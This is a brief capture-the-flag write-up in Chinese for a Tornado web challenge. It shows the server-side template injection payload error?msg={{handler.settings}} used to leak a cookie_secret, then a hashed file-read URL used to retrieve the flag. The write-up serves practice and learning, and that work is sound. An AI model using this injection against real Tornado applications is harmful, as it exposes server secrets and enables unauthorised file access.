打开题目

看到三个txt文件，分别打开这三个文件

flag在flllllllag里面

这里给出了一个加密方式，结合url中的filehash，可知要获取flag需要先获取cookie_secret，并将其与/fllllllllllllag组合加密输入到filehash中。猜测是tornado模板注入

构造payload：error?msg={{handler.settings}}

获取cookie_secret': '6244e5f4-8a2e-4512-b768-04b1117da149'}

md5加密为8a8f29db2c067b391248572282b4b140

然后构造payload得到flag

payload：/file?filename=/fllllllllllllag&filehash=8a8f29db2c067b391248572282b4b140